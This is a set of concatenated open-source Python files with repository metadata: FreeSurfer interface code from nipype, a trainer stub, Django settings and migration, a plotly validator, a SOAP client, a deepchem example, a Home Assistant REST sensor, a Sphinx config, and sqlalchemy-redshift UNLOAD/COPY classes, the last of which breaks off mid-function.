return fname
@property
def version(self):
ver = Info.version()
if ver:
if 'dev' in ver:
return ver.rstrip().split('-')[-1] + '.dev'
else:
return ver.rstrip().split('-v')[-1]
class FSScriptCommand(FSCommand):
""" Support for Freesurfer script commands with log inputs.terminal_output """
_terminal_output = 'file'
_always_run = False
def __init__(self, **inputs):
super(FSScriptCommand, self).__init__(**inputs)
self.set_default_terminal_output(self._terminal_output)
def _list_outputs(self):
outputs = self._outputs().get()
outputs['log_file'] = os.path.abspath('stdout.nipype')
return outputs
class FSScriptOutputSpec(TraitedSpec):
log_file = File('stdout.nipype', usedefault=True,
exists=True, desc="The output log")
class FSTraitedSpecOpenMP(FSTraitedSpec):
num_threads = traits.Int(desc='allows for specifying more threads')
class FSCommandOpenMP(FSCommand):
"""Support for FS commands that utilize OpenMP
Sets the environment variable 'OMP_NUM_THREADS' to the number
of threads specified by the input num_threads.
"""
input_spec = FSTraitedSpecOpenMP
_num_threads = None
def __init__(self, **inputs):
super(FSCommandOpenMP, self).__init__(**inputs)
self.inputs.on_trait_change(self._num_threads_update, 'num_threads')
if not self._num_threads:
self._num_threads = os.environ.get('OMP_NUM_THREADS', None)
if not isdefined(self.inputs.num_threads) and self._num_threads:
self.inputs.num_threads = int(self._num_threads)
self._num_threads_update()
def _num_threads_update(self):
if self.inputs.num_threads:
self.inputs.environ.update(
{'OMP_NUM_THREADS': str(self.inputs.num_threads)})
def run(self, **inputs):
if 'num_threads' in inputs:
self.inputs.num_threads = inputs['num_threads']
self._num_threads_update()
return super(FSCommandOpenMP, self).run(**inputs)
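
# --- Illustrative sketch (added for documentation; not part of nipype). It
# shows how a concrete interface might build on FSCommand; the command name,
# traits and argstr strings below are placeholders, not a real FreeSurfer tool.
class _ExampleInputSpec(FSTraitedSpec):
    in_file = File(exists=True, mandatory=True, argstr='--i %s',
                   desc='input volume (hypothetical flag)')
class _ExampleOutputSpec(TraitedSpec):
    out_file = File(desc='output volume')
class _ExampleFSInterface(FSCommand):
    """Hypothetical wrapper; subjects_dir handling is inherited from FSCommand."""
    _cmd = 'mri_example_tool'
    input_spec = _ExampleInputSpec
    output_spec = _ExampleOutputSpec
    def _list_outputs(self):
        outputs = self._outputs().get()
        outputs['out_file'] = self._gen_fname(self.inputs.in_file)
        return outputs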
|
dgellis90/nipype
|
nipype/interfaces/freesurfer/base.py
|
Python
|
bsd-3-clause
| 6,473
|
'''@file standard_trainer.py
contains the StandardTrainer'''
from nabu.neuralnetworks.trainers import trainer
class StandardTrainer(trainer.Trainer):
'''a trainer with no added functionality'''
def aditional_loss(self):
'''
add an aditional loss
returns:
the aditional loss or None
'''
return None
def chief_only_hooks(self, outputs):
'''add hooks only for the chief worker
Args:
outputs: the outputs generated by the create graph method
Returns:
a list of hooks
'''
return []
def hooks(self, outputs):
'''add hooks for the session
Args:
outputs: the outputs generated by the create graph method
Returns:
a list of hooks
'''
return []
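
# --- Illustrative sketch (added for documentation; not part of nabu): the same
# hook points overridden to add an L2 penalty and a step-counter hook. The
# TensorFlow 1.x calls below are assumptions about the surrounding framework.
import tensorflow as tf
class L2RegularizedTrainer(trainer.Trainer):
    '''example trainer that adds an L2 regularisation term to the loss'''
    def aditional_loss(self):
        # the original (misspelled) hook name is kept so the override takes effect
        weights = tf.trainable_variables()
        return 1e-4 * tf.add_n([tf.nn.l2_loss(w) for w in weights])
    def chief_only_hooks(self, outputs):
        return []
    def hooks(self, outputs):
        return [tf.train.StepCounterHook()]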
|
vrenkens/nabu
|
nabu/neuralnetworks/trainers/standard_trainer.py
|
Python
|
mit
| 844
|
SECRET_KEY = 'fake-key'
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"django_nose",
"tests",
]
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
NOSE_ARGS = [
'--with-coverage',
'--cover-package=search_views',
]
|
bianchimro/django-search-views
|
tests/settings.py
|
Python
|
mit
| 289
|
import _plotly_utils.basevalidators
class TickfontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self, plotly_name="tickfont", parent_name="layout.ternary.aaxis", **kwargs
):
super(TickfontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Tickfont"),
data_docs=kwargs.pop(
"data_docs",
"""
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
""",
),
**kwargs
)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/layout/ternary/aaxis/_tickfont.py
|
Python
|
mit
| 1,549
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('caudexer', '0002_auto_20151107_1409'),
]
operations = [
migrations.AlterField(
model_name='goodreadsdata',
name='good_reads_id',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='googlebooksdata',
name='google_book_id',
field=models.CharField(max_length=100),
),
]
|
hacktm15/caudexer
|
dexer/caudexer/migrations/0003_auto_20151107_1415.py
|
Python
|
mit
| 589
|
#!/usr/bin/env python
from ZSI import Binding
MESSAGE = "Hello from Python!"
def main():
binding = Binding(url='http://localhost:8080/server.py')
print ' Sending: %s' % MESSAGE
response = binding.echo(MESSAGE)
    print 'Response: %s' % response
if __name__ == '__main__':
main()
|
acigna/pywez
|
zsi/doc/examples/client/send_request/simple/Binding/client.py
|
Python
|
mit
| 301
|
import deepchem as dc
import numpy as np
import sklearn
from sklearn.ensemble import RandomForestClassifier
N = 100
n_feat = 5
n_classes = 3
X = np.random.rand(N, n_feat)
y = np.random.randint(3, size=(N,))
dataset = dc.data.NumpyDataset(X, y)
sklearn_model = RandomForestClassifier(class_weight="balanced", n_estimators=50)
model = dc.models.SklearnModel(sklearn_model)
# Fit the model
print("About to fit model")
model.fit(dataset)
model.save()
print("About to evaluate model")
train_scores = model.evaluate(dataset, sklearn.metrics.roc_auc_score, [])
print("Train scores")
print(train_scores)
|
lilleswing/deepchem
|
examples/multiclass/multiclass_sklearn.py
|
Python
|
mit
| 605
|
"""
Support for RESTful binary sensors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/binary_sensor.rest/
"""
import logging
from homeassistant.components.binary_sensor import BinarySensorDevice
from homeassistant.components.sensor.rest import RestData
from homeassistant.const import CONF_VALUE_TEMPLATE
from homeassistant.helpers import template
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'REST Binary Sensor'
DEFAULT_METHOD = 'GET'
# pylint: disable=unused-variable
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup REST binary sensors."""
resource = config.get('resource', None)
method = config.get('method', DEFAULT_METHOD)
payload = config.get('payload', None)
verify_ssl = config.get('verify_ssl', True)
rest = RestData(method, resource, payload, verify_ssl)
rest.update()
if rest.data is None:
_LOGGER.error('Unable to fetch Rest data')
return False
add_devices([RestBinarySensor(
hass, rest, config.get('name', DEFAULT_NAME),
config.get(CONF_VALUE_TEMPLATE))])
# pylint: disable=too-many-arguments
class RestBinarySensor(BinarySensorDevice):
"""A REST binary sensor."""
def __init__(self, hass, rest, name, value_template):
"""Initialize a REST binary sensor."""
self._hass = hass
self.rest = rest
self._name = name
self._state = False
self._value_template = value_template
self.update()
@property
def name(self):
"""Return the name of the binary sensor."""
return self._name
@property
def is_on(self):
"""Return true if the binary sensor is on."""
if self.rest.data is None:
return False
if self._value_template is not None:
self.rest.data = template.render_with_possible_json_value(
self._hass, self._value_template, self.rest.data, False)
return bool(int(self.rest.data))
def update(self):
"""Get the latest data from REST API and updates the state."""
self.rest.update()
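
# Example configuration.yaml entry (illustrative; the keys mirror the
# config.get() lookups in setup_platform above, values are placeholders):
#
#   binary_sensor:
#     platform: rest
#     resource: http://192.168.1.10/status
#     method: GET
#     verify_ssl: true
#     name: Door sensor
#     value_template: '{{ value_json.door_open }}'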
|
aoakeson/home-assistant
|
homeassistant/components/binary_sensor/rest.py
|
Python
|
mit
| 2,159
|
#!/usr/bin/env python
import sys
args = ' '.join(sys.argv[1:])
print(f"""Deprecated as of commit 959939b771. Use flask utility script instead:
$ flask {args}
""")
raise SystemExit(1)
|
betterlife/flask-psi
|
manage.py
|
Python
|
mit
| 184
|
# -*- coding: utf-8 -*-
#
# dolphintools documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 12 22:39:14 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'dolphintools'
copyright = u'2015, Alper Kucukural'
author = u'Alper Kucukural'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'dolphintoolsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'dolphintools.tex', u'dolphintools Documentation',
u'Alper Kucukural', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'dolphintools', u'dolphintools Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'dolphintools', u'dolphintools Documentation',
author, 'dolphintools', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
nephantes/dolphin-tools
|
docs/conf.py
|
Python
|
mit
| 9,231
|
import collections
import numbers
import re
import sqlalchemy as sa
from sqlalchemy.ext import compiler as sa_compiler
from sqlalchemy.sql import expression as sa_expression
# At the time of this implementation, no specification for a session token was
# found. After looking at a few session tokens they appear to be the same as
# the aws_secret_access_key pattern, but much longer. An example token can be
# found here:
# https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html
# The regexs for access keys can be found here:
# https://blogs.aws.amazon.com/security/blog/tag/key+rotation
# The pattern of IAM role ARNs can be found here:
# http://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html#arn-syntax-iam
ACCESS_KEY_ID_RE = re.compile('[A-Z0-9]{20}')
SECRET_ACCESS_KEY_RE = re.compile('[A-Za-z0-9/+=]{40}')
TOKEN_RE = re.compile('[A-Za-z0-9/+=]+')
AWS_ACCOUNT_ID_RE = re.compile('[0-9]{12}')
# '-' is placed last in the character class so it is a literal hyphen, not a range.
IAM_ROLE_NAME_RE = re.compile('[A-Za-z0-9+=,.@_-]{1,64}')
def _process_aws_credentials(access_key_id=None, secret_access_key=None,
session_token=None, aws_account_id=None,
iam_role_name=None):
if (access_key_id is not None and secret_access_key is not None and
aws_account_id is not None and iam_role_name is not None):
raise TypeError(
'Either access key based credentials or role based credentials '
'should be specified, but not both'
)
credentials = None
if aws_account_id is not None and iam_role_name is not None:
if not AWS_ACCOUNT_ID_RE.match(aws_account_id):
raise ValueError(
'invalid AWS account ID; does not match {pattern}'.format(
pattern=AWS_ACCOUNT_ID_RE.pattern,
)
)
elif not IAM_ROLE_NAME_RE.match(iam_role_name):
raise ValueError(
'invalid IAM role name; does not match {pattern}'.format(
pattern=IAM_ROLE_NAME_RE.pattern,
)
)
credentials = 'aws_iam_role=arn:aws:iam::{0}:role/{1}'.format(
aws_account_id,
iam_role_name,
)
if access_key_id is not None and secret_access_key is not None:
if not ACCESS_KEY_ID_RE.match(access_key_id):
raise ValueError(
'invalid access_key_id; does not match {pattern}'.format(
pattern=ACCESS_KEY_ID_RE.pattern,
)
)
if not SECRET_ACCESS_KEY_RE.match(secret_access_key):
raise ValueError(
'invalid secret_access_key; does not match {pattern}'.format(
pattern=SECRET_ACCESS_KEY_RE.pattern,
)
)
credentials = 'aws_access_key_id={0};aws_secret_access_key={1}'.format(
access_key_id,
secret_access_key,
)
if session_token is not None:
if not TOKEN_RE.match(session_token):
raise ValueError(
'invalid session_token; does not match {pattern}'.format(
pattern=TOKEN_RE.pattern,
)
)
credentials += ';token={0}'.format(session_token)
if credentials is None:
raise TypeError(
'Either access key based credentials or role based credentials '
'should be specified'
)
return credentials
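
# For illustration, the credential strings produced above look like:
#   role-based:  'aws_iam_role=arn:aws:iam::123456789012:role/ExampleRole'
#   key-based:   'aws_access_key_id=AKIA...;aws_secret_access_key=...'
# with ';token=<session_token>' appended when a session token is supplied.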
def _process_fixed_width(spec):
    """Render a FIXEDWIDTH spec, e.g. [('id', 10), ('name', 32)] -> 'id:10,name:32'."""
    return ','.join(('{0}:{1:d}'.format(col, width) for col, width in spec))
class _ExecutableClause(sa_expression.Executable,
sa_expression.ClauseElement):
pass
class UnloadFromSelect(_ExecutableClause):
"""
Prepares a Redshift unload statement to drop a query to Amazon S3
https://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD_command_examples.html
Parameters
----------
select: sqlalchemy.sql.selectable.Selectable
The selectable Core Table Expression query to unload from.
    unload_location: str
        The Amazon S3 location where the files will be created, or a manifest
        file location if the `manifest` option is used
access_key_id: str, optional
Access Key. Required unless you supply role-based credentials
(``aws_account_id`` and ``iam_role_name``)
secret_access_key: str, optional
Secret Access Key ID. Required unless you supply role-based credentials
(``aws_account_id`` and ``iam_role_name``)
session_token : str, optional
aws_account_id: str, optional
AWS account ID for role-based credentials. Required unless you supply
key based credentials (``access_key_id`` and ``secret_access_key``)
iam_role_name: str, optional
IAM role name for role-based credentials. Required unless you supply
key based credentials (``access_key_id`` and ``secret_access_key``)
manifest: bool, optional
Boolean value denoting whether data_location is a manifest file.
delimiter: File delimiter, optional
defaults to '|'
fixed_width: iterable of (str, int), optional
List of (column name, length) pairs to control fixed-width output.
encrypted: bool, optional
Write to encrypted S3 key.
gzip: bool, optional
Create file using GZIP compression.
add_quotes: bool, optional
Quote fields so that fields containing the delimiter can be
distinguished.
null: str, optional
Write null values as the given string. Defaults to ''.
escape: bool, optional
For CHAR and VARCHAR columns in delimited unload files, an escape
character (``\\``) is placed before every occurrence of the following
characters: ``\\r``, ``\\n``, ``\\``, the specified delimiter string.
If `add_quotes` is specified, ``"`` and ``'`` are also escaped.
allow_overwrite: bool, optional
Overwrite the key at unload_location in the S3 bucket.
parallel: bool, optional
If disabled unload sequentially as one file.
"""
def __init__(self, select, unload_location, access_key_id=None,
secret_access_key=None, session_token=None,
aws_account_id=None, iam_role_name=None,
manifest=False, delimiter=None, fixed_width=None,
encrypted=False, gzip=False, add_quotes=False, null=None,
escape=False, allow_overwrite=False, parallel=True):
if delimiter is not None and len(delimiter) != 1:
raise ValueError(
'"delimiter" parameter must be a single character'
)
credentials = _process_aws_credentials(
access_key_id=access_key_id,
secret_access_key=secret_access_key,
session_token=session_token,
aws_account_id=aws_account_id,
iam_role_name=iam_role_name,
)
self.select = select
self.unload_location = unload_location
self.credentials = credentials
self.manifest = manifest
self.delimiter = delimiter
self.fixed_width = fixed_width
self.encrypted = encrypted
self.gzip = gzip
self.add_quotes = add_quotes
self.null = null
self.escape = escape
self.allow_overwrite = allow_overwrite
self.parallel = parallel
@sa_compiler.compiles(UnloadFromSelect)
def visit_unload_from_select(element, compiler, **kw):
"""Returns the actual sql query for the UnloadFromSelect class."""
template = """
UNLOAD (:select) TO :unload_location
CREDENTIALS :credentials
{manifest}
{delimiter}
{encrypted}
{fixed_width}
{gzip}
{add_quotes}
{null}
{escape}
{allow_overwrite}
{parallel}
"""
el = element
qs = template.format(
manifest='MANIFEST' if el.manifest else '',
delimiter=(
'DELIMITER AS :delimiter' if el.delimiter is not None else ''
),
encrypted='ENCRYPTED' if el.encrypted else '',
fixed_width='FIXEDWIDTH AS :fixed_width' if el.fixed_width else '',
gzip='GZIP' if el.gzip else '',
add_quotes='ADDQUOTES' if el.add_quotes else '',
escape='ESCAPE' if el.escape else '',
null='NULL AS :null_as' if el.null is not None else '',
allow_overwrite='ALLOWOVERWRITE' if el.allow_overwrite else '',
parallel='PARALLEL OFF' if not el.parallel else '',
)
query = sa.text(qs)
if el.delimiter is not None:
query = query.bindparams(sa.bindparam(
'delimiter', value=element.delimiter, type_=sa.String,
))
if el.fixed_width:
query = query.bindparams(sa.bindparam(
'fixed_width',
value=_process_fixed_width(el.fixed_width),
type_=sa.String,
))
if el.null is not None:
query = query.bindparams(sa.bindparam(
'null_as', value=el.null, type_=sa.String
))
return compiler.process(
query.bindparams(
sa.bindparam('credentials', value=el.credentials, type_=sa.String),
sa.bindparam(
'unload_location', value=el.unload_location, type_=sa.String,
),
sa.bindparam(
'select',
value=compiler.process(
el.select,
literal_binds=True,
),
type_=sa.String,
),
),
**kw
)
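
# --- Illustrative usage sketch (added for documentation; not part of the
# original module). The table, S3 location and IAM role are placeholders.
def _example_unload_statement():
    meta = sa.MetaData()
    users = sa.Table('users', meta,
                     sa.Column('id', sa.Integer),
                     sa.Column('email', sa.String))
    # Executing the returned statement on a Redshift connection runs UNLOAD.
    return UnloadFromSelect(
        sa.select([users.c.id, users.c.email]),
        unload_location='s3://example-bucket/unload/users_',
        aws_account_id='123456789012',
        iam_role_name='RedshiftUnloadRole',
        delimiter='|',
        gzip=True,
    )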
class CopyCommand(_ExecutableClause):
"""
Prepares a Redshift COPY statement.
Parameters
----------
to : sqlalchemy.Table or iterable of sqlalchemy.ColumnElement
The table or columns to copy data into
data_location : str
The Amazon S3 location from where to copy, or a manifest file if
the `manifest` option is used
access_key_id: str, optional
Access Key. Required unless you supply role-based credentials
(``aws_account_id`` and ``iam_role_name``)
secret_access_key: str, optional
Secret Access Key ID. Required unless you supply role-based credentials
(``aws_account_id`` and ``iam_role_name``)
session_token : str, optional
aws_account_id: str, optional
AWS account ID for role-based credentials. Required unless you supply
key based credentials (``access_key_id`` and ``secret_access_key``)
iam_role_name: str, optional
IAM role name for role-based credentials. Required unless you supply
key based credentials (``access_key_id`` and ``secret_access_key``)
format : str, optional
CSV, JSON, or AVRO. Indicates the type of file to copy from
quote : str, optional
Specifies the character to be used as the quote character when using
``format='CSV'``. The default is a double quotation mark ( ``"`` )
delimiter : File delimiter, optional
defaults to ``|``
path_file : str, optional
Specifies an Amazon S3 location to a JSONPaths file to explicitly map
Avro or JSON data elements to columns.
defaults to ``'auto'``
fixed_width: iterable of (str, int), optional
List of (column name, length) pairs to control fixed-width output.
compression : str, optional
GZIP, LZOP, indicates the type of compression of the file to copy
accept_any_date : bool, optional
Allows any date format, including invalid formats such as
``00/00/00 00:00:00``, to be loaded as NULL without generating an error
defaults to False
accept_inv_chars : str, optional
Enables loading of data into VARCHAR columns even if the data contains
invalid UTF-8 characters. When specified each invalid UTF-8 byte is
replaced by the specified replacement character
blanks_as_null : bool, optional
Boolean value denoting whether to load VARCHAR fields with whitespace
only values as NULL instead of whitespace
date_format : str, optional
Specified the date format. If you want Amazon Redshift to automatically
recognize and convert the date format in your source data, specify
``'auto'``
empty_as_null : bool, optional
Boolean value denoting whether to load VARCHAR fields with empty
values as NULL instead of empty string
encoding : str, optional
``'UTF8'``, ``'UTF16'``, ``'UTF16LE'``, ``'UTF16BE'``. Specifies the
encoding type of the load data
defaults to ``'UTF8'``
escape : bool, optional
When this parameter is specified, the backslash character (``\``) in
input data is treated as an escape character. The character that
immediately follows the backslash character is loaded into the table
as part of the current column value, even if it is a character that
normally serves a special purpose
explicit_ids : bool, optional
Override the autogenerated IDENTITY column values with explicit values
from the source data files for the tables
fill_record : bool, optional
Allows data files to be loaded when contiguous columns are missing at
the end of some of the records. The missing columns are filled with
either zero-length strings or NULLs, as appropriate for the data types
of the columns in question.
ignore_blank_lines : bool, optional
Ignores blank lines that only contain a line feed in a data file and
does not try to load them
ignore_header : int, optional
Integer value of number of lines to skip at the start of each file
dangerous_null_delimiter : str, optional
Optional string value denoting what to interpret as a NULL value from
the file. Note that this parameter *is not properly quoted* due to a
difference between redshift's and postgres's COPY commands
interpretation of strings. For example, null bytes must be passed to
redshift's ``NULL`` verbatim as ``'\\0'`` whereas postgres's ``NULL``
accepts ``'\\x00'``.
remove_quotes : bool, optional
Removes surrounding quotation marks from strings in the incoming data.
All characters within the quotation marks, including delimiters, are
retained.
roundec : bool, optional
Rounds up numeric values when the scale of the input value is greater
than the scale of the column
time_format : str, optional
Specified the date format. If you want Amazon Redshift to automatically
recognize and convert the time format in your source data, specify
``'auto'``
trim_blanks : bool, optional
Removes the trailing white space characters from a VARCHAR string
truncate_columns : bool, optional
Truncates data in columns to the appropriate number of characters so
that it fits the column specification
comp_rows : int, optional
Specifies the number of rows to be used as the sample size for
compression analysis
comp_update : bool, optional
Controls whether compression encodings are automatically applied.
If omitted or None, COPY applies automatic compression only if the
target table is empty and all the table columns either have RAW
encoding or no encoding.
If True COPY applies automatic compression if the table is empty, even
if the table columns already have encodings other than RAW.
If False automatic compression is disabled
max_error : int, optional
If the load returns the ``max_error`` number of errors or greater, the
load fails
defaults to 100000
no_load : bool, optional
Checks the validity of the data file without actually loading the data
stat_update : bool, optional
Update statistics automatically regardless of whether the table is
initially empty
manifest : bool, optional
Boolean value denoting whether data_location is a manifest file.
"""
formats = ['CSV', 'JSON', 'AVRO', None]
compression_types = ['GZIP', 'LZOP']
def __init__(self, to, data_location, access_key_id=None,
secret_access_key=None, session_token=None,
aws_account_id=None, iam_role_name=None,
format=None, quote=None,
path_file='auto', delimiter=None, fixed_width=None,
compression=None, accept_any_date=False,
accept_inv_chars=None, blanks_as_null=False, date_format=None,
empty_as_null=False, encoding=None, escape=False,
explicit_ids=False, fill_record=False,
ignore_blank_lines=False, ignore_header=None,
dangerous_null_delimiter=None, remove_quotes=False,
roundec=False, time_format=None, trim_blanks=False,
truncate_columns=False, comp_rows=None, comp_update=None,
max_error=None, no_load=False, stat_update=None,
manifest=False):
credentials = _process_aws_credentials(
access_key_id=access_key_id,
secret_access_key=secret_access_key,
session_token=session_token,
aws_account_id=aws_account_id,
iam_role_name=iam_role_name,
)
if delimiter is not None and len(delimiter) != 1:
raise ValueError('"delimiter" parameter must be a single '
'character')
if ignore_header is not None:
if not isinstance(ignore_header, numbers.Integral):
raise TypeError(
'"ignore_header" parameter should be an integer'
)
if format not in self.formats:
raise ValueError('"format" parameter must be one of %s' %
self.formats)
if compression is not None:
if compression not in self.compression_types:
raise ValueError(
'"compression" parameter must be one of %s' %
self.compression_types
)
table = None
columns = []
if isinstance(to, collections.Iterable):
for column in to:
if table is not None and table != column.table:
raise ValueError(
'All columns must come from the same table: '
'%s comes from %s not %s' % (
column, column.table, table
),
)
columns.append(column)
table = column.table
else:
table = to
self.table = table
self.columns = columns
self.data_location = data_location
self.credentials = credentials
self.format = format
self.quote = quote
self.path_file = path_file
self.delimiter = delimiter
self.fixed_width = fixed_width
self.compression = compression
self.manifest = manifest
self.accept_any_date = accept_any_date
self.accept_inv_chars = accept_inv_chars
self.blanks_as_null = blanks_as_null
self.date_format = date_format
self.empty_as_null = empty_as_null
self.encoding = encoding
self.escape = escape
self.explicit_ids = explicit_ids
self.fill_record = fill_record
self.ignore_blank_lines = ignore_blank_lines
self.ignore_header = ignore_header
self.dangerous_null_delimiter = dangerous_null_delimiter
self.remove_quotes = remove_quotes
self.roundec = roundec
self.time_format = time_format
self.trim_blanks = trim_blanks
self.truncate_columns = truncate_columns
self.comp_rows = comp_rows
self.comp_update = comp_update
self.max_error = max_error
self.no_load = no_load
self.stat_update = stat_update
@sa_compiler.compiles(CopyCommand)
def visit_copy_command(element, compiler, **kw):
"""
Returns the actual sql query for the CopyCommand class.
"""
qs = """COPY {table}{columns} FROM :data_location
WITH CREDENTIALS AS :credentials
{format}
{parameters}"""
parameters = []
bindparams = [
sa.bindparam(
'data_location',
value=element.data_location,
type_=sa.String,
),
sa.bindparam(
'credentials',
value=element.credentials,
type_=sa.String,
),
]
if element.format == 'CSV':
format_ = 'FORMAT AS CSV'
if element.quote is not None:
format_ += ' QUOTE AS :quote_character'
bindparams.append(sa.bindparam(
'quote_character',
value=element.quote,
type_=sa.String,
))
elif element.format == 'JSON':
format_ = 'FORMAT AS JSON AS :json_option'
bindparams.append(sa.bindparam(
'json_option',
value=element.path_file,
